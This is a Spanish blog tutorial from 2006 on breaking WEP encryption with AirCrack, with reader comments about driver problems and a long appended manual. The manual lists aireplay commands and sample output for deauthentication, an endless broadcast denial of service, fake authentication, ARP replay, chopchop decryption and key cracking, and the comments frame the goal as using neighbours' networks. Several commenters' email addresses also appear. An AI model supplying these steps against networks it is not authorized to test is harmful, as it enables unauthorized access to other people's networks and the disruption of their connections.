Tutorial: Hacking Wireless
30 Dic 2006
En este mini-tutorial explico como conectarte a una wireless que tenga encriptación WEP desde Windows o Linux. En primer lugar quiero decir que este tutorial no va destinado para robar información, ataques contra otras máquinas… Y demás actos vandálicos sino con carácter didáctico, enseñar un poco más acerca de cómo van las redes wireless. De hecho tiraré mucho de la Wikipedia para definiciones de términos más técnicos
En primer lugar quiero que vean este video:
En el video se muestra paso a paso lo que tienes que hacer para desencriptar la clave WEP de una red wireless y poder conectarte a ella. No es tan sencillo como pone el video.
Esto me recordaba a un video de The Broken que mediante un sniffer y el AirSnort descifraban claves de wireless capturando paquetes. El funcionamiento es el siguiente: el sniffer captura tráfico, dentro del tráfico capturado está la clave encriptada, y el AirSnort mediante un algoritmo matemático la desencriptaba. El problema es que había que capturar MUCHOS paquetes para poder adquirir la clave. Si la red del vecino no tenía mucho tráfico podías pasarte semanas para desencriptarla.
Las ventajas del AirCrack, el programa que utilizan en el video, son dos: la primera es que está todo integrado (sniffer, capturador de paquetes, desencriptador…) y la segunda que tiene versiones para Windows y para Linux.
Todo es muy bonito en el video y muy rápido pero las cosas no son así. Vamos a ir paso a paso viendo lo que se realiza en el video y que problemas podremos encontrar.
Antes de nada debes prepararte para poder utilizar el programa. Necesitas un Sniffer como el NetStumbler para ver las redes que tienes a tu alrededor, cuáles tienen encriptación WEP y en que canal actúan. Y en segundo lugar debes poner tu tarjeta en modo promiscuo.
En Linux es sencillo:
iwconfig [adaptador] mode monitor
Pero en Windows es más complicado. Necesitas descargarte un driver específico. En la web de AirCrack te explican de forma detallada cuáles son compatibles y cuáles no y demás. En esta lista podrás mirar que driver necesitas y dependiendo cuál sea, podrás descargarlo: Atheros o Hermes. Además necesitarás los archivos Peek.dll, Peek5.sys y Msvcr70.dll que se pueden descargar aqui y que deberás ponerlos en el mismo directorio que el aircrack.exe.
NOTA: todo esto en Linux estaría hecho con un simple comando… Esto nos indica una vez más que si queremos tener mayor control de nuestro sistema operativo… ¡¡HAY QUE MIGRAR A LINUX!!
Una vez preparado todo para poder utilizar el AirCrack comenzamos ejecutándolo y dentro de este ejecutando el airoDump para capturar paquetes. Seleccionamos la tarjeta wireless, decimos de que tipo es la interfaz: Atheros (a) o Hermes (o), seleccionamos el canal donde está la wireless que queremos hackear, lo indicó el NetStumbler; y por último indicas el nombre del archivo donde quieres guardar la información y si sólo deseas desencriptar aquellas que tienen clave WEP. ¡¡Y a capturar tráfico!!
Aqui nos puede asaltar otra duda: ¿Cuánto tráfico capturar? Hacen falta entre 500.000 a 1.000.000 paquetes IV si la WEP es de 104 bits. Los paquetes IV, vectores de inicialización, son los necesarios para la encriptación.
Una vez que hayamos alcanzado estas cifras, paramos el airoDump y ejecutamos el AirCrack, seleccionamos el archivo con las capturas del airoDump y listo!! A mí me tardó 30 segundos con 500.000 paquetes en Windows y 23 segundos con 500.000 paquetes en Ubuntu.
NOTA: tuve problemas para volver al modo normal, no promiscuo. Tuve que instalar de nuevo mi antiguo driver de la tarjeta wireless así que antes de hacer nada localícenlo!!
Cualquier duda o comentario… ¡¡A comentarlo! Un saludo.
Hola de nuevo.. es para ver si alguien haria el favor de hecharme una mano, se lo agradecere, mi tarjeta es una conceptronic c54, el dia que fui a comprarla compre una a USB y otra a PCI. de todas formas eso no importa mucho, entonces al instalar drivers atheros o hermes me dice que no, entonces me gustaria que si alguien sabe que drivers pueden ser compatibles que lo ponga en el foro gracias os estare muy agradecidos
tengo un problemon con mi wireles 802.11 b/b broadcom de una portatil aspire 5040, lo q pasa q tenia instalado windows home y le instale el windows vista (bussines), el problema fue q no puedo habilitar la red inalambrica con este nuevo sistema, ya e intentado con otros controladores, la tarjeta si esta visible pero las funciones de los botones de encendido no funcionan para nada …
si alguien puede ayudarme le agradeceria gracias….
oigan soy de nuevo ya funciona mi wirelees esta en liga pagina http://secure3.tx.acer.com/VistaDownloads/AcerSeries.aspx hay q descargar el
Launch Manager 1.1.1.5.1 y lo instalan para el funcionamiento del inalambrico ya q mi problema fue en vista, por si a alguien le sirve de gran ayuda…
hola a todos encontre esta pagina y me parece super interesante, estoy intentando hacerlo pero no soy capaz, me bajo los drivers (los habidos y por haber) y me meto en el administrador de dispositivos, cuando intento actualizar los drivers de mi tarjeta de red, me pide el archivo .inf y cuando lo selecciono me dice “No contiene informacion acerca del hardware” y no puedo hacer nada, alguien me puede ayudar? Gracias. xfavorr
otra pregunta mis dos adaptadores de red son
-Realtek R8168/8111 PCI-E Gigabit Ethernet NIC
-Intel(R) PRO/Wireless 3945ABG Network Connection
Cual tengo que usar¿??? toy un poco perdio
a ver he instalado el driver realtek para mi tarjeta que es elunico que me deja instalar pero a la hora de utilizar el airodump me da este error
“failed to set de wireless channel. Is something wrong with the card? Also make sure you have installed the correct driver” q puedo hacer??? ayuda porfavor
HOLA SOY NEWBIE Y EN EL AIRODUMP ME ATRANCO AQUI QUE PUEDO HACER FATAL“failed to set de wireless channel. Is something wrong with the card? Also make sure you have installed the correct driver” q puedo hacer??? ayuda porfavor
tengo una pregunta acerk de todo esto …….
…….los usuarios de la red q estoy “robando” se dan cuenta q lo hago??
Hola, mi tarjeta es USB DWL-G132 D-link , el chipset es Atheros ..pero segun leo en la pagna de atheros , este adaptador USB no se´puede poner en modo monitor y tampoco tiene un driver en Athera… hay algo q pueda hacer ? algun driver equivalente o convertor …….
una duda… se debe desinstalar el driver original (el q viene conel adpatador USB) es decir se debe desisntalar el adaptador??
Mi problema es que cuando ejecuto aircrack en windows, el mismo empieza a desencriptar pero cuando lleva un rato la ventana de ms2 donde se esta ejecutando desaparece y no da ningún tipo de dato.
Ayuda, por favor!!
PD: Lo he lanzado con 850.000 IV
Mi tarjeta es una Intel® Centrino 3945ABG pero no se que driver meterle porque no aparece en la lista pero en el video del principio utilizan esta tarjeta con los drivers athero.Me podeis echar un cable
Muchas gracias
hola necesito ayuda no se que drivers tengoque instalar y la verda no se mucho de esto
en adaptadores de red aparese esto
-realtekrtl8139/810x family fast ethernet nic
-wlan broadcom 802.11b/g
detodos los que baje solo uno puedo instalar pero cuando lo instalo me aparece un signo de ! admiracion alado izquierdo de la tarjeta
alquien me puede decir que estoy asiendo mal
ola soy nuevo en esto si os digo la verdad no tengo ni idea de como va esto solo kiero saber esto io tengo un pc de mesa si no tengo wifi no puedo conectarme a otros router o con mi router puedo encontrar otras redes y conectarme aydenme plis si no me entiendesn diganmelo gracias.
wenas otra preguntilla cuando pongo el programa network le doy para k me buske redes y me dice no wireles adapter found ayudenme plis.gracias
aver otra cosa pero veo k es tonteria escribir nadie contestasta.bueno esta mi pregunta cuando me bajo los driver no los puedo instalar osea no esta el .exe sale solo un arxivo k se le eso k ago lo copio y pego en algun lao k e contestar por favoooor .
Hola Napo!
Cuál es tu problema? Has seguido el tutorial y cuando has terminado no podías detectar Wireless o simplemente no has hecho nada y no puedes detectarlas?
En cualquiera de los casos puede ser fallo de los drivers, deberás bajártelos de Internet o del CD que te dieron con el PC e instalarlos (los drivers son los de tu tarjeta wireless… ni Atheros ni nada…).
Para instalarlos te vas a Mi PC, pinchas con el botón derecho, vas a propiedades y allí a la pestaña de Hardware. Allí pinchas en Administrador de dispositivos. Buscas tu tarjeta wireless, le das a botón derecho y seleccionas “actualizar controlador”. En este punto es donde debes seleccionar tu driver y se instalará.
Un saludo!
Hola, Pablo Arellano referente a tu comentario de
“Mi tarjeta es una Intel® Centrino 3945ABG pero no se que driver meterle porque no aparece en la lista pero en el video del principio utilizan esta tarjeta con los drivers athero.Me podeis echar un cable
Muchas gracias”
tengo entendido que todavia no hay drivers para portatiles centrino ni core duo, es decir para nuestras targetas por eso no nos funciona, habra que esperar a que los saquen, yo ya me he cansado de buscar en vano. Si alguien sabe algo que avise vale?
muchas gracias.
salu2
vien gracias una cosa cuando le doy a actualizar controladora me dice k no a encontrado otros sofware mas apropiados nose exenme una mano plis gracias.
Hola a tod@s, ..y gracias por este tutorial..
Me ha quedado bastante claro todo, con el inconveniente de que tengo una intel pro wireless 2200bg, así que como novato, a no ser que alguien me diga algo, a pagar, verdad?
De todas formas, os quería preguntar, ya que a lo mejor hay que pagar, que tarjeta recomendais xa un portátil Toshiba (creo que es centrino).. espero que esto no implique que me tenga que comprar otro portátil..
sigo teniendo problemas con los driver no encuentro actualizaciones ni naa de na me toy volviendo loco aver tengo una targeta es una sis 900- based pci fast ethernet adapter aver si me podis ayudar
Hola tengo una tarjeta Intel 3945AGB y no hay manera de meterle drivers. No me los coje al actualizar con los archivos inf. Por favor llevo dias investigando y no consigo nada. Necesito ayuda, por mas tiempo que gasto leyendo y probando me es imposible. Gracias.
Mi correo es antoniohuesas@hotmail.com
Ah por cierto tengo windows media center (por desgracia parece para estas cosas) Gracias nuevamente y espero ayuda.
Hola!el tutorial es una caña, mxs gracias. xo tng un problema con las IV’s…cuantas necesito xa conseguir la WEP?? con 2242 IV’s llevo 30 minutos y no la encuentra. Gracias un saludo
HOLA, QUERIA PREGUNTAR SI ESTO MISMO SIRVE PARA WINDOWS VISTA X64 PORQUE ME ACABO DE CONSEGUIR UNA NOTEBOOK Y ME GUSTARIA HACER ESTO, UNA AYUDADITA PLEASE!!!
HOLAAAA XD BUENO PUES PRIMERO CHIDO POR TODOS USTEDES QUE HACEN POSIBLE ESTE TIPO DE PAJINAS ME ENCANTA TODO LO REFERENTE AL HACKIN PERO YO TENGO UN PROBLEMA CON EL PROGRAMA AL MOMENTO DE BUSCAR LOS DRIVER PARA MI TARJETA INALAMBRICA NO LOS ENCUENTRO MI TARJETA ES ( IEEE 802.11g Wireless USB Adapter ) SOLO ME HACEN FALTA LOS DRIVERS PERO NO APARECE MI TARJETA EN LA LISTA LES AGRADECERIA MUCHO SI ALGIEN ME ALLUDARA A ENCONTRARLOS O ME DIJIERA QUE PUEDO HACER PORFABOR ALGIEN AYUDEME SE LOS AGRADESCO DE ANTEMANO Y GRACIAS BYE XD
estoy esperando una respuesta por favor ayudenme con lo de los driver gracias.
Hola, tengo un problema, espero que me puedas ayudar, tengo una notebook compaq presario V3115 LA, tiene una WLAN Broadcom 802.11b/g con NVIDIA nForce Networking Controller.
El Network Stumbler lo pude instalar y funciona muy bien detecta en mi casa una red inalámbrica en canal 6 con encriptación WEP.
Puedo descargar los archivos que indica en esta página (Peek.dll, peek.sys y Peek5.sys) y ponerlos en la carpeta (bin) del aircrack.
Puedo abrir el Aircrack-ng GUI.exe, en la pestaña Airdump-ng selecciono Launch
En la ventana para poner los parámetros necesarios aparece lo siguiente:
2 WLAN Broadcom 802.11b/g
5 NVIDIA nForce Networking Controller
Escribo el 2
Después selecciono “a” (Aironet/Atheros)
Y por último en el canal elijo el 6
Guardo el archivo.
Y me manda automáticamente a una página para descargar el Atheros.
Después en la pestaña de Airocrack-ng elijo el archivo que he creado y pulso Launch
Es aquí donde surge un problema, se abre una ventana en donde me aparece el siguiente mensaje:
Opening C:\Documents and Settings\nacho jimenez\Escritorio\aircrack-ng-0.6.2-win\bin\mycapture.ivs
Read 0 packets.
No networks found, exiting.
C\Documents and Settings\nacho jimenez\Escritorio\aircrack-ng-0.6.2-win\bin>_
He descargado el Atheros en la versión 4.2.1 pero no se que hacer con esos archivos que descargo, son 3:
ar5211.sys
net511.inf
readme.htm
Y hasta aquí he podido llegar, no se que más hacer
esto es un timo joder io llebo 3 meses para que me contesten alos post y no hay manera :s
Hola Napo!
No desesperes! Esto no es un foro. Es complicado que la gente contesteya que aquíno hay mucha actividad (en la zona de comentarios)
Lo que puedes hacer es mandarme un mail a pisitoenmadrid@gmail.com. Explícame bien el problema y te contesto.
Un saludo!!
oye tengo un problema tengo una taregeta de este modelo Intel(R) PRO/Wireless 2200BG Network Connection y no se que driver instalar por fa necesito ayuda mandadmelo a esta direccion de correo: juanlr_25@hotmail.com
Gracias de antemano!!!!
en linux con iwconfig [adaptador] mode monitor pones a la tarjeta en modo promiscuo, dentro de adaptador ke tenes ke poner? o la palabra adaptador es y para volver a modo no promiscuo en linux.
bueno gracias saludos.
En adaptador va el nombre del adaptador: wlan0, eth0.. Probablemente el primero.
se podria hacer con el airport de mac???
gracias por la respuesta y para volver a modo no promiscuo es solo cerrando la consola de comandos? porke tengo miedo ke me kede mal la tarjeta, todo estoy te estoy preguntando si lo hiciera en linux
saludos
creo ke lo encontre en vez de poner monitor pongo managed, toy en lo cierto?
saludos
una cosa cuando abro el air crack y le doy a bind luego kiero abrir el archivo aircrack-ng GUI no se me abre k programa necesito para abrilo gracias.
pal miki… weon cambiate de sistema operativo… descarga los controladores y te va a significar un ahorro de tiempo de aprox 2 meses…
instala alguna wea de linux ya que es lo más simple y parchea tu controlador… y despues tienes todas las pasadas… si eso no te funka, te puedes comunicar conmigo a mi mail diegoandres0666@hotmail.com.., los belmont sino los deby… jajaja xau
como descargo el controlador para una tarjeta inalambrica de marca encore
ya que el cd de instalación lo perdí
Hola..bueno..todo para tarjetas de red…y para USB??
por que yo no lo consigo encontrar..aunqeu bueno, hay qeu decir que estoy un poko dormida…
pro que ya lo intente..y no consigo encontrar si es hermes o la otra que se me ha olvidado el nombre, qeu torpe estoy…
si veo qeu tampoco se os ocurre, pues probare con las 2 a ver que me cuenta!!!
muchas gracias!!
pro cierto me encanta el caracolillo este en planm jedi…
y qeu decir qeu muchas gracas pro la informacion y la explicacion..me ha parecido supersencilla….veremo despues con el yo y la practica!!!
Hola Amigos!
Tengo todo instalado, pero la descarga de IVs es muy lenta…
¿hay alguna manera de “agilizar” la entrada de IVs??
a la velocidad q va en 5 meses tendré el millon de IVs…
que puede estar mal?
SALUDOS
ayuda con aircrack, ya lo descarge tal como en el video y ya tambien descarge las hrramientas del peek e intento correr el aircrack-ng gui.exe y me manda un error de que no se puede ejecutar la aplicasion, que debo hacer o que me falta por hacer para lograr ejekutarlo ayuda porfavor..
hola instale todo como sale en el vedeo no tuve problema pero al correr airoDump y poner la tarjeta en modo promiscuo no pesca tengo un nottbok un toshiba satellite el cual usa tarjeta intel pro/wireless 3045abg si me pueden ayudar para buscar los controladores que le sirvan por f se los agradseria mucho gracias
io cuento con windows xp , pero tambien uso el ubuntu , pero la verdad no he encontado drivers para ubuntu , nose si alguien lo ha logrado a hacer con esta tarjeta inalambrica
Network Adapter Atheros AR5006EG Wireless Network Adapter , es de una toshiba satellite m115-s1061
les agradeceria su ayuda
hola tengo un pavilon dv2000 HP pero no he podido sacar el signo de arroa por favor me pueden indicar
Tengo el mismo problema que tenia paquito…yo tengo:
-intel(r) PRO/wireless 2200BG network connection y….
- REALTEK RTL8139/810x family Gibabit ethernet NIC
y no sé que drivers tengo que instalarl para que me funcione el airodump…:( alguien los sabe?????? Gracias
Tengo un macbook pro y todo esto se hace con KISMAC pero el mio es de los nuevos y no se puede.
Bueno el tema es q tengo en la maquina virtual el windows y preguntaba a ver si puedo hacerlo ahi y si me cambiara el driver del mac o solo afectara a la maquina virtual.
Gracias
Aircrack es una colección de herramientas para la auditoria de redes inalámbricas:
• airodump: programa para la captura de paquetes 802.11
• aireplay: programa para la inyección de paquetes 802.11
• aircrack: crackeador de claves estáticas WEP y WPA-PSK
• airdecap: desencripta archivos de capturas WEP/WPA
Podéis descargarlas y aprender más sobre como funcionan en:
http://www.aircrack-ng.org/doku.php?id=aircrack-ng.es
Este manual se ha creado a partir de otros muchos encontrados en la red y en base a la experiencia con el propio programa. Su fin es meramente educativo. El acceso a redes protegidas para conseguir datos de sus usuarios así como usar sus servicios como propios es totalmente ilegal.
Configuración Hardware
En la misma página podemos encontrar más información sobre el hardware compatible.
En principio, hay una versión para Windows, pero por compatibilidad con el hardware y que no hay posibilidad de inyectar tráfico, usaremos la versión de Linux, sobre Ubuntu 7.04, que es fácil y rápida de instalar.
Es importante un mínimo de conocimientos sobre el manejo del shell (Terminal), que nadie se asuste, con cd (cambio de directorios) y poco más nos basta.
Funciona correctamente con los drivers que te instala automáticamente para tarjetas basadas en rt2500, concretamente he probado “conceptronic usb c54ru”, y “obislink pcmcia”, y el mismo aircrack las pone en modo monitor (escucha), necesario para captar las redes e inyectar tŕafico.
Estas tarjetas aunque dan buenos resultados, pero su alcance es corto así que como no seamos un manitas y les soldemos una antena, o la red es muy cercana o la señal no será suficiente.
Para SMC CWPCITT-G, una tarjeta wíreless pci, no podía usar los drivers propietarios, así que he tenido que instalar los drivers de madwifi, y parchearlos para la inyección de tráfico. Están en el Web, no son difíciles de encontrar.
Debemos seguir estos pasos dentro del shell (debemos hacerlo con privilegios de administrador, “root”, del sistema, para ello añadimos sudo antes de cada comando):
Asegurar que tenemos instalado los compiladores, si no recurrir a synaptic (g , gcc,…)
En negrita pondré lo que debéis teclear, precedidos del sudo y dentro de la carpeta del driver.
ifconfig ath0 down
ifconfig wifi0 down
rmmod wlan_wep ath_rate_sample ath_rate_onoe ath_pci wlan ath_hal ath_rate_amrr 2>/dev/null
cd madwifi-ng
patch -Np1 -i ../madwifi-ng-r2277.patch
make
make install
depmod -ae
modprobe ath_pci
Para que nos los cargue automáticamente al arrancar el so debemos añadir el alias:
sudo gedit /etc/modprobe.b/aliases
y añadimos:
alias ath0 ath_pci
al final del archivo, guardamos y listo.
Además deberemos teclear cada vez que iniciemos el sistema y vayamos a usar aircrack:
sudo wlanconfig ath0 destroy
sudo modprobe -r ath_pci
sudo modprobe ath_pci autocreate=monitor
Recordar que este sólo es para la SMC pci basada en atheros.
El motivo de que me extienda con la configuración de esta tarjeta pese a ser algo tediosa, es por que con unos 40 € de inversión en una tarjeta pci, y una antena omnidireccional de 6 db también SMC, se consiguen unos resultados excelentes.
Pasemos a aircrack.
Primeros compilamos con make para generar los ejecutables, dentro de la carpeta de aircrack.
En primer lugar usamos airodump para ver las redes que captamos, para ello usamos un shell:
sudo ./airodump -ng ath0
ath0 en mi caso es la interface de la inalámbrica (ra0, rausb0,…); podemos verlo en la administración de red de Ubuntu.
Con esto vemos el tráfico por pantalla
BSSID PWR Beacons # Data CH MB ENC ESSID
00:13:10:30:24:9C 46 15 3416 6 54. WEP the ssid
00:09:5B:1F:44:10 36 54 0 11 11 OPN NETGEAR
BSSID STATION PWR Packets Probes
00:13:10:30:24:9C 00:09:5B:EB:C5:2B 48 719 the ssid
00:13:10:30:24:9C 00:02:2D:C1:5D:1F 190 17 the ssid
En la parte superior tenemos las redes, y en la inferior los clientes asociados.
Características:
Field Description
BSSID Dirección MAC del punto de acceso.
PWR Nivel de señal reportado por la tarjeta. Su significado depende del controlador, pero conforme te acercas al punto de acceso o a la estación la señal aumenta. Si PWR == -1, el controlador no soporta reportar el nivel de señal.
Beacons Número de paquetes-anuncio enviados por el AP. Cada punto de acceso envía unos diez beacons por segundo al ritmo (rate) mínimo (1M), por lo que normalmente pueden ser recogidos desde muy lejos.
# Data Número de paquetes de datos capturados (si es WEP, sólo cuenta IVs), incluyendo paquetes de datos de difusión general.
CH Número de canal (obtenido de los paquetes beacon). Nota: algunas veces se capturan paquetes de datos de otros canales aunque no se esté alternando entre canales debido a las interferencias de radiofrecuencia.
MB Velocidad máxima soportada por el AP. Si MB = 11, entonces se trata de 802.11b, si MB = 22 entonces es 802.11b y velocidades mayores son 802.11g.
ENC Algoritmo de encriptación en uso. OPN = sin encriptación, “WEP?” = WEP o mayor (no hay suficiente datos para distinguir entre WEP y WPA), WEP (sin la interrogación) indica WEP estática o dinámica, y WPA si TKIP o CCMP están presentes.
ESSID Conocida como “SSID”, puede estar vacía si el ocultamiento de SSID está activo. En este caso airodump tratará de recuperar el SSID de las respuestas a escaneos y las peticiones de asociación.
STATION Dirección MAC de cada estación asociada. En la captura de más arriba se han detectado dos clientes (00:09:5B:EB:C5:2B y 00:02:2D:C1:5D:1F).
Ahora vamos con aireplay, para ello usemos otro shell:
Si el controlador está correctamente parcheado, aireplay es capaz de inyectar paquetes 802.11 en modo Monitor en bruto; actualmente implementa un conjunto de 5 ataques diferentes.
Nos centraremos en 1, 3, 4 que han sido los más efectivos. El 0 y 2 no me han resultado útiles.
Si recibes el mensaje “ioctl(SIOCGIFINDEX) failed: No such device”, revisa que el nombre de tu dispositivo es correcto y que no has olvidado un parámetro en la línea de comandos.
En los siguientes ejemplos, 00:13:10:30:24:9C es la dirección MAC del punto de acceso, 00:09:5B:EB:C5:2B es la dirección MAC de un cliente inalámbrico y 00:11:22:33:44:55 la propia.
Ataque 0: deautenticación
Este ataque es probablemente el más útil para recuperar un ESSID oculto (no difundido) y para capturar “saludos” WPA forzando a los clientes a reautenticarse. También puede ser usado para generar peticiones ARP en tanto que los clientes Windows a veces vacían su cache de ARP cuando son desconectados. Desde luego, este ataque es totalmente inservible si no hay clientes asociados.
Normalmente es más efectivo fijar como blanco una estación específica usando el parámetro -c.
Algunos ejemplos:
Captura del “saludo” WPA una Atheros
airmon.sh start ath0
airodump ath0 out 6 (cambia a otra consola)
aireplay -0 5 -a 00:13:10:30:24:9C -c 00:09:5B:EB:C5:2B ath0
(espera unos segundos)
aircrack -w /ruta/al/diccionario out.cap
Generar peticiones ARP con una tarjeta Prism2
airmon.sh start wlan0
airodump wlan0 out 6 (cambia a otra consola)
aireplay -0 10 -a 00:13:10:30:24:9C wlan0
aireplay -3 -b 00:13:10:30:24:9C -h 00:09:5B:EB:C5:2B wlan0
Después de enviar tres tandas de paquetes de deautenticación, comenzamos a escuchar en busca de peticiones ARP con el ataque 3. La opción -h es esencial y debe ser la dirección MAC de un cliente asociado.
Si el controlador es wlan-ng, debes ejecutar el script airmon.sh; de otro modo la tarjeta no estará preparada correctamente para la inyección.
Denegación de servicio masiva con una tarjeta RT2500
airmon.sh start ra0
aireplay -0 0 -a 00:13:10:30:24:9C ra0
Con el parámetro 0, este ataque enviará en un bucle infinito paquetes de deautenticación a las direcciones de broadcast, evitando así que los clientes permanezcan conectados.
Ataque 1: autenticación falsa
Este ataque es particularmente útil cuando no hay clientes asociados: creamos la dirección MAC de un cliente falso, la cual quedará registrada en la tabla de asociación del AP. Esta dirección será usada para los ataques 3 (reinyección de peticiones ARP) y 4 (desencriptación WEP “chopchop”).
De todos modos si este ataque falla y hay ya un cliente asociado, es más efectivo usar simplemente su dirección MAC (aquí, 00:09:5B:EB:C5:2B) para los ataques 3 y 4.
Si no conocemos nuestra Mac (aunque hay muchas formas de saberlo), os diré una forma de saberla en el ataque 3.
sudo ./aireplay-ng -1 0 -e “el ssid” -a 00:13:10:30:24:9C -h 00:11:22:33:44:55 ath0
12:14:06 Sending Authentication Request
12:14:06 Authentication successful
12:14:06 Sending Association Request
12:14:07 Association successful
Puede ocurrir que debas usarlo varias veces seguidas para que funcione.
Algunos puntos de acceso requieren de reautenticación cada 30 segundos, si no nuestro cliente falso será considerado desconectado. En este caso utiliza el retardo de re-asociación periódica:
sudo ./aireplay-ng -1 30 -e “el ssid” -a 00:13:10:30:24:9C -h 00:11:22:33:44:55 ath0
Si este ataque parece fallar (aireplay permanece enviando paquetes de petición de autenticación), puede que esté siendo usado un filtrado de direcciones MAC. Asegúrate también de que:
• Estás lo suficientemente cerca del punto de acceso.
• El controlador está correctamente parcheado e instalado.
• La tarjeta está configurada en el mismo canal que el AP.
• El BSSID y el ESSID (opciones -a / -e) son correctos.
• Si se trata de Prism2, asegúrate de que el firmware está actualizado.
Como recordatorio: no puedes inyectar con un chipset Centrino, Hermes, ACX1xx, Aironet, ZyDAS, Marvell o Broadcom debido a limitaciones de firmware y/o controlador.
Ataque 2: Reenvío interactivo de paquetes
Este ataque te permite elegir un paquete dado para reenviarlo; a veces proporciona resultados más efectivos que el ataque 3 (reinyección automática de ARP).
Podrías usarlo, por ejemplo, para intentar el ataque “redifundir cualesquiera datos”, el cuál sólo funciona si el AP realmente reencripta los paquetes de datos WEP:
aireplay -2 -b 00:13:10:30:24:9C -n 100 -p 0841 \
-h 00:09:5B:EB:C5:2B -c FF:FF:FF:FF:FF:FF ath0
También puedes usar el ataque 2 para reenviar manualmente paquetes de peticiones ARP encriptacas con WEP, cuyo tamaño es bien 68 o 86 bytes (dependiendo del sistema operativo):
aireplay -2 -b 00:13:10:30:24:9C -d FF:FF:FF:FF:FF:FF \
-m 68 -n 68 -p 0841 -h 00:09:5B:EB:C5:2B ath0
aireplay -2 -b 00:13:10:30:24:9C -d FF:FF:FF:FF:FF:FF \
-m 86 -n 86 -p 0841 -h 00:09:5B:EB:C5:2B ath0
Ataque 3: Reinyección de petición ARP
El clásico ataque de reinyección de petición ARP es el mas efectivo para generar nuevos IVs, y funciona de forma muy eficaz. Necesitas o bien la dirección MAC de un cliente asociado (00:09:5B:EB:C5:2B), o bien la de un cliente falso del ataque 1 (00:11:22:33:44:55). Puede que tengas que esperar un par de minutos, o incluso más, hasta que aparezca una petición ARP; este ataque fallará si no hay tráfico.
Por favor, fíjate en que también puedes reutilizar una petición ARP de una captura anterior usando el interruptor -r.
sudo ./aireplay-ng -3 -b 00:13:10:30:24:9C -h 00:11:22:33:44:55 ath0
Saving ARP requests in replay_arp-0627-121526.cap
You must also start airodump to capture replies.
Read 2493 packets (got 1 ARP requests), sent 1305 packets…
Si utilizais despues de -h una MAC asociada, os saldrá un mensaje diciendo que no coincide con vuestra MAC, y os la sacará en la consola, ahí la tenéis (esa es la vuestra).
Ataque 4: El “chopchop” de KoreK (predicción de CRC)
Este ataque, cuando es exitoso, puede desencriptar un paquete de datos WEP sin conocer la clave. Incluso puede funcionar con WEP dinámica. Este ataque no recupera la clave WEP en sí misma, sino que revela meramente el texto plano. De cualquier modo, la mayoría de los puntos de acceso no son en absoluto vulnerables. Algunos pueden en principio parecer vulnerables pero en realidad tiran los paquetes menores de 60 bytes. Este ataque necesita al menos un paquete de datos WEP.
sudo ./aireplay-ng -4 -b 00:13:10:30:24:9C -h 00:09:5B:EB:C5:2B ath0
Podemos utilizar la Mac propia después de -h si hemos utilizado antes el ataque 1 de forma satisfactoria.
Por experiencia 1 y 3 es la combinación ideal.
Volvemos al shell anterior, el de airodump y usamos Ctrl C para pararlo, y relanzarlo, ahora especificaremos el canal y el archivo donde queremos guardar los paquetes capturados:
sudo ./airodump -ng ath0 –channel X -w file
Si todo va bien deberemos empezar a capturar Ivs , es decir, data aumente de forma continua y a una velocidad decente en un par de minutos.
¿Cuántos IVs se necesitan para crackear WEP ?
El crackeo WEP no es una ciencia exacta. El número de IVs necesarios depende de la longitud de la clave WEP, y también de la suerte. Normalmente, una clave WEP de 40-bit puede ser crackeada con 300.000 IVs, y una de 104-bit con 1.000.000 de IVs; teniendo mala suerte se pueden necesitar dos millones de IVs, o más.
No hay ninguna manera de saber la longitud de la clave WEP: esta información está oculta y nunca es anunciada, guardada bien en paquetes de gestión, bien en paquetes de datos; como consecuencia, airodump no puede reportar la longitud de la clave WEP. Por ese motivo, se recomienda ejecutar aircrack dos veces: cuando tienes 250.000 IVs, inicias aircrack con “-n 64″ para crackear la WEP de 40-bit. Si no la sacas, vuelves a iniciar aircrack (sin la opción -n) para crackear la WEP de 104-bit.
Una vez capturados los suficientes aproximadamente usamos aircrack:
sudo ./aircrack-ng -c -s file-01.cap
Opciones de aircrack:
Opción Param. Descripción
-a amode Fuerza el tipo de ataque (1 = WEP estática, 2 = WPA-PSK).
-e essid Si se especifica, se usarán todos los IVs de las redes con el mismo ESSID. Esta opción es necesaria en el caso de que el ESSID no esté abiertamente difundido en un crackeo WPA-PSK (ESSID oculto).
-b bssid Selecciona la red elegida basándose en la dirección MAC.
-p nbcpu En sistemas SMP , especifica con esta opción el número de CPUs.
-q none Activa el modo silencioso (no muestra el estado hasta que la clave es o no encontrada).
-c none (crackeo WEP) Limita la búsqueda a caracteres alfanuméricos sólamente (0×20 – 0×7F).
-d start (crackeo WEP) Especifica el comienzo de la clave WEP (en hex), usado para depuración.
-m maddr (crackeo WEP) Dirección MAC para la que filtrar los paquetes de datos WEP. Alternativamente, especifica -m ff:ff:ff:ff:ff:ff para usar todos y cada uno de los IVs, indiferentemente de la red que sea.
-n nbits (crackeo WEP) Especifica la longitud de la clave: 64 para WEP de 40-bit , 128 para WEP de 104-bit , etc. El valor predeterminado es 128.
-i index (crackeo WEP) Conserva sólo los IVs que tienen este índice de clave (1 a 4). El comportamiento predeterminado es ignorar el índice de la clave.
-f fudge (crackeo WEP) De forma predeterminada, este parámetro está establecido en 2 para WEP de 104-bit y en 5 para WEP de 40-bit. Especifica un valor más alto para elevar el nivel de fuerza bruta: el crackeo llevará más tiempo, pero con una mayor posibilidad de éxito.
-k korek (crackeo WEP) Hay 17 ataques de tipo estadístico de korek. A veces un ataque crea un enorme falso positivo que evita que se obtenga la clave, incluso con grandes cantidades de IVs. Prueba -k 1, -k 2, … -k 17 para ir desactivando cada uno de los ataques de forma selectiva.
-x none (crackeo WEP) No aplicar fuerza bruta sobre los dos últimos keybytes.
-y none (crackeo WEP) Éste es un ataque de fuerza bruta experimental único que debería ser usado cuando el método normal de ataque falle con más de un millón de IVs.
-w words (WPA cracking) Ruta hacia la lista de palabras.
Si hemos capturados más de un archivo, los ponemos a continuación del primero y aircrack usara todos.
Por experiencia, si tarda más de 4-5 minutos en sacar la clave, podéis olvidaros. Mejor capturar más paquetes.
Si todo funciona, ya la tenemos, yuju!!!!!!!!
Pero aun nos queda otro problema, si el router no tiene habilitado DHCP, y la puerta de enlace no es la habitual para usar IP estática (las típicas 192.168.1.1 y 192.168.0.1), no podemos saber si es correcta.
Para encontrar la puerta de enlace usamos airdecap sobre uno de los archivo cap que hemos utilizado, da igual que sea pequeño, con que contenga 30 IVs ya vale.
sudo ./airdecap-ng -w clave_wep_obtenida file.cap
La clave wep la escribiremos en hexadecimal y sin usar puntos para separarla.
Si la clave es correcta, escribe en el shell un mensaje con el número de paquetes que se han desencriptado, esta claro que ha de ser mayor de 0, no?
Si ha ido bien tendremos un nuevo file.cap pero de la forma file-dec.cap
